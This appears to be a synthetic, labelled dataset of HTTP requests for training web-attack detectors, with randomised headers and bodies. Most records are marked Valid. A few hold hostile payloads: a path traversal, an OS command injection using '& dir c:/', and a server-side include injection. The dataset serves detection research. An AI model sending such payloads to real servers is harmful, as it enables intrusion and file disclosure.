Transfer-Encoding: deflate
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 644 www.h7jist.js:4 "esfqduza4efrwceom" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 91293701405226650926
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47951
Start - Id: 4961
class: Valid
PUT /k5QvggfVmFek882EXM/Tcat.AFRuv/lu.PD5RHbmPnq@5FJiYA/xDtmpi/eenanMze8tpo1hafl4/oYIfvbscriptvNcx/OSu85b9exA/eg9s/dqO/rT5.html? HTTP/1.0
Content-Length: 39
Content-Language: uSeh5pik
Content-Encoding: deflate
Content-Location: /otve.swf
Content-MD5: TG5mZWZuMmx4YnIwdG01Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Sep 06 22:43:27 CET
Last-Modified: Thu, 28 May 09 10:51:43 CET
Host: www.roehcne.uk
Connection: close
Accept: image/png;q=0.4, text/plain
Accept-Charset: big5
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 58.210.102.54
Cookie: rheTbftoe2h9E6=mEn0tt
Cookie2: $Version="607"
Date: Wed, 12 Jul 06 20:12:50 UTC
ETag: W/".RVg91q.nGCx@5v"
Expect: Ckpnl
From: zqhtasa7@rsaljt.it
If-Modified-Since: Fri, 19 Oct 07 03:40:21 CET
If-Unmodified-Since: Fri, 29 Aug 08 16:35:50 GMT
If-Match: *
If-None-Match: "APbL8AS7upFW2UOVm4o9"
If-Range: "pSvxoJLbVKMmrfzYbk7d"
Max-Forwards: 145
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM eWxvbHNtZTZJYklvZXRuN3lyNkhyemF3ZXN3RWVkdGJqM3NrZzNl
Authorization: Basic YW5uZklhOnN0bDFlRW8=
Range: 35-56855
Referer: http://www.S5Da.ch/ihe2e/cenp/bnDag.jsp
TE: chunked;q=0.7,gzip;q=0.1,chunked;q=0.7
Trailer: Accept-Charset
User-Agent: oIgY58 http://www.halveSo.org
UA-CPU: Sparc
UA-Disp: 1425,8375,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 527x0259
Via: 3.3 91.153.75.250:033, FTP/8.7 www.r2ycr.htm, FTP/4.7 www.3ile8r.jpg
Transfer-Encoding: deflate
Upgrade: sng/7.6, eaor7/9.5, taop/9.3, dnAf/9.2
Warning: 173 28.187.74.144 "intyt8" "Wed, 16 Jan 08 01:05:54 UTC"
X-Forwarded-For: 26.142.203.81
X-Serial-Number: 3100317318115604683
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nEin4yasee=7305&ahyAtiss7ane=ofXs8V-i_5

End - Id: 4961
Start - Id: 14279
class: Valid
GET /oiDafnEid/aOgUP.EOju.3E7E@Vb/.xd/tdnt/hwaweopnrhpltel4eto/Q10aMDyaR0a6_851w.tiff?5vWCbh6PjU4vbscript=lh&SiKcJNtmpg2XPV=retaarht06O9oimTk&eftyOeeman=fqKkF6V HTTP/1.0
Host: 172.202.79.167
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1257, gb2312;q=0.4
Accept-Encoding: 
Accept-Language: tes-uswocd, wO-IaHeL, lue-oiaEf, wgtjhea-9;q=0.6, ielbYq-5eAd;q=0.0
Cache-Control: max-age=11908
Client-ip: 12.204.42.238
Cookie: ri=eNlugMB5wYWN
Cookie2: $Version="842"
Date: Sun, 11 Jun 06 05:53:30 CET
ETag: W/"9LA.bvtOcbMnTrA"
Expect: 100-continue
From: oe2dsde@zdatnNenc.net
If-Modified-Since: Thu, 21 Sep 06 18:07:32 UTC
If-Unmodified-Since: Tue, 16 May 06 08:53:01 CET
If-Match: *
If-None-Match: *
If-Range: "Z0kT8_oHbRKsSjxr.S"
Max-Forwards: 726
MIME-Version: 7.4
Pragma: e7e2uhi=soee1nwa
Proxy-Authorization: Basic aGU1ZWg6c2VhZjc=
Authorization: Basic aGVvc2Zzdkw6ZWdjZQ==
Range: 118-,169-11
Referer: http://www.eWftw2.gov/teSiiEad.js
TE: trailers,deflate,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.7 (X11; U; Solaris 3.1; at-en; rv:0.2.1) Gecko/40136155
UA-CPU: MIPS
UA-Disp: 280,047,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2883x951
Via: 3.6 121.212.176.85
Transfer-Encoding: deflate
Upgrade: tut/3.1, tnmcy/2.5, 9Pn5n/5.5, wtte/0.4, sWn/2.2
Warning: 261 160.174.141.172 "5cebyhn2vuze" "Sun, 25 Jun 06 09:52:04 UTC"
X-Forwarded-For: 235.126.58.179
X-Serial-Number: 0081275585581186032
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14279
Start - Id: 25499
class: Valid
GET /6orT-zlycILsLn/a00sOOE3BcBc6BXp9rau/yWefaMt/eLMAUX.-v1Nc4/eMsm/qyhortiuabvwaYft/Rduyocv/rkhW7B21nsAzRFU/szAJUYFs2/ehl.php4? HTTP/1.1
Host: www.busdnslh.it
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic;q=0.9, x-mac-chinesetrad, x-mac-arabic;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 83.25.232.183
Cookie: le=x1Q5;dpltewlnseepyu=Ao;qtu0eeeaohdSee= execil/ 2systemlibe8vbscriptsot;usalpsyaimtn=6029817;ftp51AG285R=esns
Cookie2: $Version="05"
Date: Fri, 24 Sep 04 05:05:23 CET
ETag: "xeMHXS.UEEH_vcbqUX"
Expect: omsithNt=uUodoh
From: hhexy@ieecah.it
If-Modified-Since: Wed, 07 May 08 19:04:15 GMT
If-Unmodified-Since: Thu, 25 Jan 07 14:53:45 UTC
If-Match: "vz0ajy6.xCr2mb7n"
If-None-Match: *
If-Range: Mon, 24 Jul 06 20:56:20 CET
Max-Forwards: 271
MIME-Version: 7.5
Pragma: tinscij='nhpS90uo'
Proxy-Authorization: ptss fnjE=diionlr
Authorization: swanct ll8yn=1esi
Range: 95-099091,5-
Referer: /atgShrf/td4wnect/pxtnoot.aspx
TE: trailers,gzip;q=0.9
Trailer: Authorization
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 2.7; s3-ei; rv:1.3.8) Gecko/76799823
UA-CPU: 68000
UA-Disp: 0760,497,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5796x493
Via: FTP/4.4 20.194.111.17, 9.2 www.sito6.jpg:46, FTP/9.0 203.63.180.32
Transfer-Encoding: gzip
Upgrade: ownr/0.4
Warning: 857 81.72.64.201:0289 "eelt7eziiiiloger" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 91549794
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25499
Start - Id: 30987
class: Valid
GET /s9cen6tzNhntztf/keeueufqIo0ma/otwepttneinl3i/ptjlc8rgl9ns/wFDURXBe.php?select4ogGJNG6=599&gors=190895760&oLuomc=5386150405&st3rtssostbadiS=tbeay HTTP/1.1
Host: www.muatsfrc.be:483
Connection: close
Accept: application/*;q=0.3, video/quicktime
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.1, compress
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 80.169.77.77
Cookie: tMfdwdgRr=3g;hLa=25286044
Cookie2: $Version="052"
Date: Wed, 09 Mar 05 09:31:36 GMT
ETag: W/"rvAXXRC87.FboYLeBLm"
Expect: 7thgrh=svury4er;thSg=rhei1fpc
From: grsl@tetg8e3sNy.uk
If-Modified-Since: Tue, 28 Feb 06 13:16:13 CET
If-Unmodified-Since: Tue, 29 Sep 09 16:05:58 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 24 Aug 06 16:37:26 CET
Max-Forwards: 7147
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM cnBlcGFyaWFhbDdsc25XZWl0c0VsYXJwZTBlc3Rvcndza3pkUE5ibnR2
Range: 6-
Referer: /epREn/aDae.nsf
TE: trailers,gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.7 (X11; U; SunOS sun4u 7.5; th-tx; rv:5.2.5) Gecko/33826274
UA-CPU: MIPS
UA-Disp: 502,919,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 301x912
Via: FTP/9.9 www.zhns.shtml, 1.2 129.237.155.138, FTP/8.3 180.221.160.143:322
Transfer-Encoding: aoeas; wuhit2n=bagcbew
Upgrade: eeeh/0.3, fDafA/6.5, cd2jet/7.1
Warning: 422 57.104.58.135 "ellasImt7s5o" 
X-Forwarded-For: 228.18.153.246
X-Serial-Number: 65625
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30987
Start - Id: 45408
class: PathTransversal
PUT /gn2El64bylteks/8Dcmd1E/mnsesee/sPrbj8Dz@TU/P3phomc.exe? HTTP/1.1
Content-Length: 289
Content-Language: 2dTe
Content-Encoding: compress
Content-Location: http://yshdrm.it/zwtiu4tT/anaa/edu3temn/rgizt.php
Content-MD5: c21lZW9uZ25zdGxsdGFhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Feb 05 18:50:20 GMT
Last-Modified: Sat, 25 Aug 07 07:16:01 CET
Host: www.xtehegoCoe.be
Connection: llnehhu1
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 204.131.31.4
Cookie: nEae=isjs5srrEuEx
Cookie2: $Version="401"
Date: Thu, 11 Jun 09 01:59:53 UTC
ETag: "WCamEE4jLaBwbRq"
Expect: tfrsm=sosgerh;sBoaj3pd=n6aTco
From: d1Subs@Oaeelb.fr
If-Modified-Since: Tue, 02 Jan 07 20:20:53 GMT
If-Unmodified-Since: Sun, 19 Apr 09 13:57:57 GMT
If-Match: *
If-None-Match: "ZyM0YzM6F1Vm2sLWX@Z"
If-Range: "is5.OAWIIPMufqKrAkWQ"
Max-Forwards: 57
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: qei4S 0e1e=mede
Authorization: Basic ODZ0YWE6cnZ5cnd6d3A=
Range: 50-63221
Referer: /aauin.php
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: bnswoediaonuremsxkt
UA-CPU: MIPS
UA-Disp: 9471,9312,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 789x027
Via: 1.7 www.EeUye.jpeg:2471, FTP/5.2 14.230.33.46, 9.5 244.163.75.91
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 279789
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hOe=baCopPladj5NpSs9tq&nyfstyleW=3318&mePh6Rw5=368620&Erjdl=025093&cktoacssiadhta=njei7eeeygv&va0n7s=wl5nfainsertega>eshzsGnw&ote7qcre=oendsenhatrlseze&s4lihwe=8837&mat=/../../../Inetpub/iissamples/elge/laenre/demenasior/totiteitic.mspx&1acceptqEFj=286628964&7nenii=a6f

End - Id: 45408
Start - Id: 44310
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.0
Host: 253.188.184.66:80
Connection: keep-alive
Accept: application/postscript, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ieo-l;q=0.0, aaw-der;q=0.5
Cache-Control: min-fresh=4
Client-ip: 18.62.79.179
Cookie: dgkliwem=bcbk
Cookie2: $Version="933"
Date: Sat, 22 May 04 16:30:33 GMT
ETag: "qNdlMwHthtzDSJln2L"
Expect: 100-continue
From: leh3n2e@apiaad.biz
If-Modified-Since: Mon, 23 Mar 09 01:02:09 UTC
If-Unmodified-Since: Sat, 01 Jan 05 11:06:56 GMT
If-Match: "hEKqVspPv891iUYJza"
If-None-Match: "A7c7bTtAgzQPgGqy9qh"
If-Range: *
Max-Forwards: 37
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=47dBd7FC
Authorization: Basic YWtubjpvdXJh
Range: -2
Referer: http://www.rw6eoot.be/sinx4.mdb
TE: chunked,chunked,gzip
Trailer: Transfer-Encoding
User-Agent: 3qx5vAsF http://www.itNiryA.be
UA-CPU: MIPS
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5984x276
Via: FTP/7.2 74.126.183.152, 1.0 www.rlsed9ar.css, 7.1 www.5E3at.js:35
Transfer-Encoding: etecs7
Upgrade: ott9i/7.1, tei/4.6
Warning: 284 www.natmB.jpeg:92644 "Hmt9" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44310
Start - Id: 33074
class: Valid
POST /gwtaeuOen/s6lVitzIMlenklUw63Si/rirtss/tH@JqvE87vxV4QBE4x-/4e8/hcat2/licaraeAanem/Cfsnae/g7e0hPec8flrcbnt0.html? HTTP/1.0
Content-Length: 19
Content-Language: 8ue,o1,0ira
Content-Encoding: gzip
Content-Location: http://9one.be/Mabeut.conf
Content-MD5: ZG93TnphZGxyZ3VxYWV1Ug==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 14 Apr 05 07:49:46 CET
Last-Modified: Wed, 27 Jan 10 11:49:46 CET
Host: www.rqub.ch
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-turkish;q=0.8, shift_jis, x-mac-turkish
Accept-Encoding: deflate, identity;q=0.5, identity
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 164.138.247.234
Cookie: Oel4hpeebs5=540;TvHk=yPlaiooaahem;eljreepAhwrioNs=n0ltrZh
Cookie2: $Version="0"
Date: Mon, 07 Dec 09 22:46:54 CET
ETag: W/"gqIWxsvwAx.L8aUb"
Expect: rrra
From: 4a64appe@alsxipenr.biz
If-Modified-Since: Fri, 03 Jul 09 17:14:28 GMT
If-Unmodified-Since: Mon, 17 Sep 07 01:27:32 GMT
If-Match: "CmeZwMOoUKjrnpCgL@"
If-None-Match: "I8loCVB_fScsfY3BQKsL"
If-Range: *
Max-Forwards: 104
MIME-Version: 3.9
Pragma: a=vIn
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic aGJBdGZyOmFsaWh0
Range: -627,-76122
Referer: http://www.i9fo8wmm.cz/reeuFe1/aZom/xe83nTn/trqad.tiff
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/1.9 (Windows; U; Windows NT 3.9; eo-9o; rv:2.1.1) Gecko/35690618
UA-CPU: MIPS
UA-Disp: 287,078,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 697x1733
Via: 9.1 88.201.79.212, HTTP/1.2 www.htesfhlt.png, 9.3 251.143.91.225
Transfer-Encoding: gzip
Upgrade: isOe/5.3, tbghye/7.5, oos/8.8, oSDrsu/0.3
Warning: 367 www.NNtthSs.tiff "ei0asr" "Mon, 07 Apr 08 05:52:20 CET"
X-Forwarded-For: 205.136.153.13
X-Serial-Number: 71160
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

omen=wSD@qRVrrp6K

End - Id: 33074
Start - Id: 33166
class: Valid
PUT /Hievt/eMyyYKMB_cR3L/tx/rQNatyLvyEA3ROVvyATv/inEFqMZTFY@H1ngxeR/mYacceptx0qHF1_9N/dlw.jpeg? HTTP/1.1
Content-Length: 342
Content-Language: telp
Content-Encoding: gzip
Content-Location: http://galrdctn.gov/notlt/itfzSid/iouT/ostr.php4
Content-MD5: YW5vbG5hZXNpY294aVM1dg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 Aug 08 19:55:00 CET
Last-Modified: Mon, 05 Apr 04 19:46:11 GMT
Host: www.qgyhclin.biz
Connection: aeEt2rm
Accept: image/jpeg, image/*;q=0.4
Accept-Charset: *
Accept-Encoding: compress, compress, compress, deflate;q=0.7
Accept-Language: *;q=0.1
Cache-Control: max-stale=8542
Client-ip: 55.144.101.196
Cookie: oDpcsfsoe=9230116;0a6fyFe9execexecg=img?a;sdh1aaccept(;nullNnh.=vefipi
Cookie2: $Version="78"
Date: Sat, 22 Apr 06 13:23:35 GMT
ETag: "NQQJkp9hmxtBHK8H"
Expect: 100-continue
From: ntsrj@mDKe5itb.net
If-Modified-Since: Sat, 25 Jul 09 02:36:00 CET
If-Unmodified-Since: Tue, 21 Jun 05 10:59:43 GMT
If-Match: *
If-None-Match: "cG.e9LfG3ubK.Xpa"
If-Range: Mon, 08 Nov 04 20:22:43 GMT
Max-Forwards: 74
MIME-Version: 5.6
Pragma: e='fewfd1'
Proxy-Authorization: Basic dnQxcjo0YWF0RXMwcg==
Authorization: dn04e beosdn=aYtr
Range: 913575-,-052
Referer: /enbab.sh
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/2.8 (compatible; Konqueror/8.8; Linux i586; tonNnrwohZ; qtiaaedkd)
UA-CPU: 68000
UA-Disp: 3344,7896,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 492x1700
Via: m8er/5.2 55.162.144.166, eAmofd/5.9 www.me0Mw.jpeg, 8.0 51.118.18.104
Transfer-Encoding: compress
Upgrade: lrh/0.7, ai4/1.8, kcj2NT/4.6
Warning: 785 59.47.177.70 "s8eahlsttutctoCtx" "Mon, 29 Sep 08 18:56:06 GMT"
X-Forwarded-For: 121.78.223.99
X-Serial-Number: 0421946796861302632
----: ----------
~~~~~: ~~~~~~~~~~~

ahrln6Tizngcs=thvdqt+h8:e&eHnahiiiMtnLae=upsg&rn=aeg&BWncgroup by25jT=fdincludeexec@varNhttp?nlikedgGb9ol&telnetCvMfgpasswd2=ebdv.l672&izggauot=Ebntl>dehomeeiureobsle&vZdzloiiehu=s~dueu&ola96aialdbho=n]d2nlihhnroc&kKfrcg37aynyaR=eGjbfw.6x3GH&MxwhereObsOIcatw=aRevftear&ncY2AK=62417&rEzformjopeny=a10Srn0inrtpposirt&doe0t=0@k m

End - Id: 33166
Start - Id: 33039
class: Valid
POST /azDEmaeO4y/ltfo7tH.CzHFs0qyUP_H/ac/tI@SRGTRcWfCsmejJD@y/sX/oosca7wt-tSaDklvRZs/mrlsah/5g.jsp? HTTP/1.0
Content-Length: 58
Content-Language: Iaeu,eE
Content-Encoding: deflate
Content-Location: /gtmhKe/adpwd/ino1ioV0.mp3
Content-MD5: bmV1aHlzbGFybjl1aWlhcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Nov 05 16:21:47 CET
Last-Modified: Fri, 05 Sep 08 07:43:14 GMT
Host: www.tlIanieew.ch
Connection: keep-alive
Accept: video/*
Accept-Charset: koi8;q=0.8, x-mac-greek
Accept-Encoding: gzip;q=0.9
Accept-Language: s-nhde;q=0.7
Cache-Control: max-stale
Client-ip: 68.106.142.25
Cookie: eeceaTR=37116023;regimgeI=Y7osN;tflbrosDet=4090;Teofthtihduncny=re4 ;epi=90993413
Cookie2: $Version="02"
Date: Tue, 12 Apr 05 01:35:16 CET
ETag: W/"7Qwj45KIW9CmgO1snJq"
Expect: 100-continue
From: etht@e9emo1dtn.net
If-Modified-Since: Thu, 22 Jan 09 09:59:00 UTC
If-Unmodified-Since: Sun, 01 Nov 09 13:28:00 GMT
If-Match: *
If-None-Match: *
If-Range: "7lWz9lHoTTTm9kKvtn@"
Max-Forwards: 3
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic cmNhcXRzOHM6ZXRvcw==
Authorization: rtsy26 oog1h=itknmzs
Range: -1,0950-
Referer: /9rwitt/uiwoxhiy/8tm76st3.js
TE: deflate,trailers,deflate
Trailer: User-Agent
User-Agent: tctu5eci4v (dJxxbkveM; n9@ne@US; nau5Ce; smqWg3-n)
UA-CPU: StrongARM
UA-Disp: 6826,952,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 3468x969
Via: 2.4 137.254.19.65:43, A6r/1.9 www.idHd.css
Transfer-Encoding: deflate
Upgrade: eabbw/5.6, t0eah/5.1, ezh/2.6
Warning: 803 202.191.75.24 "neNdednspn8tyYdraemg" "Wed, 11 Jan 06 23:45:53 CET"
X-Forwarded-For: 242.105.173.22
X-Serial-Number: 0325623356
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

Crideaqtiepm7W=6260167&tFAsafdnarsrsw=1&nhfRlotdoa=8505881

End - Id: 33039
Start - Id: 1381
class: Valid
GET /te9aalrl9ntzruu7dd/iPdYyyAtelnetYV@hkDH/esnazi.htm?lauGfpt=o7Q&eleohdtu=ehytx&4rdoalevbt=39365&uZWtt=+arq%2Frellw%24eeRa&ni=imEy%3Fn HTTP/1.1
Host: www.EttzrSs.st
Connection: 2dhrt
Accept: video/mpeg;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 116.136.216.201
Cookie: Ehome-group bychildoZOupdate6F0a=Dt;Q6X9MQYNT=taum9g5L08y;nto9aCrUdeotit1=dH9oV;Htrdrt=k$a;O6rj1otlyE=90544357
Cookie2: $Version="0"
Date: Sat, 22 Mar 08 05:06:48 CET
ETag: W/"NLDDHcD.qj9@50a1FAQw"
Expect: esLcsf7a=ho4ydnlv
From: 35iGi@atmru1aewn.net
If-Modified-Since: Sat, 22 Apr 06 03:35:04 CET
If-Unmodified-Since: Mon, 19 Jan 09 07:46:00 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0911
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic b3Rlb3QwYWk6YWRhbU5v
Authorization: NTLM T3J6dGRjbHJONDdlZm45ZTBjb2NlN29tdHVzdG5kbEhwZWV3aGRS
Range: 24-
Referer: http://www.ruEoea.st/gvnez/orXS/ejtskj/NeTnsp/uqtE.swf
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/3.2 (Windows; U; Win 9x 2.6; mr-fa; rv:5.6.1) Gecko/08098666
UA-CPU: 68000
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 238x900
Via: 5.0 84.44.182.241, 2.7 58.160.76.7:75, HTTP/8.1 193.38.115.10:67
Transfer-Encoding: gzip
Upgrade: rc0t/5.9, Dryoo/4.4, rgtOis/7.1
Warning: 832 12.107.153.6 "o9em3ihrbeRs" 
X-Forwarded-For: 123.28.90.45
X-Serial-Number: 5490878161111
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1381
Start - Id: 40828
class: SSI
GET /iJ48Eb8x_Cxu.php4?73Gqlvi71BA=n5Q0SMaCq&hlsystemNx8D=%3C%21--++++%23odbc++connect%3D%22nCeu8hr%2Cla%2Cc2dlx%22+++++++++statement%3D%22select++++*+++++from+++ic0ql%22--%3E&systemGkkGvHy3=ojozt5o+goe7ee+&ellnwidpraeiM=8202&re=71700763&eb=i9eromopente+iHibd&js3nWeig=xQmB&nnoe=467&nhaElnlje=9733&fYtwner0uo=a14lyvuOmiH8&leewe7emhlt=hQB_m5UrtU&oDaidgaon=92058 HTTP/1.0
Host: www.nyHueeore.org
Connection: ml8bmoe
Accept: video/*;q=0.0
Accept-Charset: iso-8859-6, x-mac-roman, iso-8859-2;q=0.4, x-mac-japanese;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: RsY='nhs'
Client-ip: 244.239.23.2
Cookie: wys5bazh7rcet=keEcr26wieMeo92
Cookie2: $Version="76"
Date: Sat, 06 Aug 05 02:31:36 GMT
ETag: W/"@ygQvx5XKQ4FDOQ2"
Expect: R4w4=f6aeth
From: heeo2q@daRia.de
If-Modified-Since: Fri, 09 Jan 04 24:27:00 GMT
If-Unmodified-Since: Fri, 20 Mar 09 13:48:03 UTC
If-Match: "RhS9OT_ewEpWHXoG-"
If-None-Match: *
If-Range: Mon, 18 Feb 08 04:09:16 CET
Max-Forwards: 790
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic dHNwYU86N3pqaXJDaA==
Authorization: NTLM MmlldGlveWVtZWJuYWRtbnR4dEV3aXNob250b3U4T3NzTGNpc3JlZTU=
Range: 4-703669
Referer: /i69Ht9r/uBedao.png
TE: gzip;q=0.0,gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.2 (Machintosh; U; PPC 3.2; Es-la; rv:7.2.7) Gecko/52780604
UA-CPU: PowerPC
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 938x7282
Via: FTP/2.6 154.8.51.40, 2.6 www.3hTinAj.jpg:0660, FTP/8.6 127.140.243.71
Transfer-Encoding: deflate
Upgrade: tU7st/9.0, tata/7.6, nhs/2.5, attto/4.3, a7pt/7.6
Warning: 601 42.121.7.112:3 "rlcreLunhecrNsee" 
X-Forwarded-For: 213.213.96.18
X-Serial-Number: 40747153756954
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40828
Start - Id: 21928
class: Valid
GET /z7nhpneEweLn/wieuedhpxAugNe.htm?niapiaeru3t=galrxOernHd HTTP/1.1
Host: www.tdioeo.cz
Connection: keep-alive
Accept: application/*, image/png, image/jpeg
Accept-Charset: *
Accept-Encoding: compress, deflate, deflate;q=0.3, deflate;q=0.6
Accept-Language: *;q=0.9
Cache-Control: max-stale=755
Client-ip: 173.173.55.126
Cookie: utnqetaoo=155807;Dp3mZLkkGJE= jn7gncer;ddt=xanr;70YSHPFzsock_streamq=t1oh;bpgo1trtwcsw=sohay8fhodaia
Cookie2: $Version="934"
Date: Thu, 17 Nov 05 16:03:20 CET
ETag: W/"XM6wxA4_U4sd4oar7"
Expect: 100-continue
From: eregee@ddutgEiyN.be
If-Modified-Since: Fri, 01 Oct 04 23:34:44 GMT
If-Unmodified-Since: Tue, 16 Oct 07 24:58:22 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2260
MIME-Version: 3.8
Pragma: ry6ot0mD='Fahaw'
Proxy-Authorization: Basic YXBiYTpqZW1r
Authorization: Basic NmFOaHo6YW1vbQ==
Range: 5944-,-4,93231-
Referer: /nEMhdo0/unye2b3/obso.gif
TE: trailers,chunked;q=0.6
Trailer: Referer
User-Agent: aoawofeenr (ajyBX0jN; e6s8LGQyI; 6KDDS-; aiZGvU; gRYsxKyAL)
UA-CPU: x86
UA-Disp: 964,7426,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6616x2901
Via: FTP/7.9 www.tgetrlls.tiff, 1.2 184.107.130.218, drues/1.1 www.lsm6.tiff
Transfer-Encoding: gzip
Upgrade: bggpr/4.4
Warning: 706 118.112.66.251 "faTC6" "Thu, 05 Oct 06 20:03:57 UTC"
X-Forwarded-For: 235.150.2.160
X-Serial-Number: 09176432061314
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21928
Start - Id: 13972
class: Valid
GET /RGAMMxNtl-/ieeb9sI9Yd6a/lEV0Dwjtbgsoundo_qu/tMb42LE3uAuVleZ/orO7tmEmemliheentLs/tjia1oyWddptba/udweMsHpoY5icsRjsdr/J2QFr_sVaW7boot.iniFlT/7eHG1l4bKZO/toLS5jM8wRhS7O.asmx? HTTP/1.0
Host: 231.223.122.87:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: tiecoy='r'
Client-ip: 16.127.223.115
Cookie: eeabeeyeeax=a8mtf;mdxVgn=ul4wh7l
Cookie2: $Version="026"
Date: Tue, 28 Jun 05 06:58:39 GMT
ETag: W/"8JXFlRSCoI-nI9R6pUv"
Expect: bnaeity
From: sTsgewns@snfh4s.it
If-Modified-Since: Fri, 18 Jan 08 21:50:14 GMT
If-Unmodified-Since: Tue, 30 Mar 04 01:13:23 CET
If-Match: "@wGaFEzzxBde2bjHh"
If-None-Match: "avEDuhbMoZKPBSemKakQ"
If-Range: Mon, 18 Jan 10 06:30:45 UTC
Max-Forwards: 198
MIME-Version: 2.2
Pragma: axs=dmnAbh
Proxy-Authorization: Basic dHJ1Rm1hYTphaWxvTHU=
Authorization: Basic bjZ0bjpsa2lvZWg=
Range: 178230-9027,77311-1911,5-
Referer: /1wlrsme/sEcvu/outvz/aahysko.nsf
TE: deflate;q=0.5,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.7 (Windows; U; WinNT 8.9; ee-ul; rv:1.1.1) Gecko/16190965
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7780x7588
Via: 7.4 www.iiqenF3S.css:9776
Transfer-Encoding: deflate
Upgrade: Neetri/9.3, lpnc/7.7, rmz/2.4, leg/5.0, eno/0.0
Warning: 663 www.aceotT.css:21621 "esathdczoa" "Fri, 03 Mar 06 08:29:16 GMT"
X-Forwarded-For: 231.230.155.168
X-Serial-Number: 738264285065396
----: ------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13972
Start - Id: 23117
class: Valid
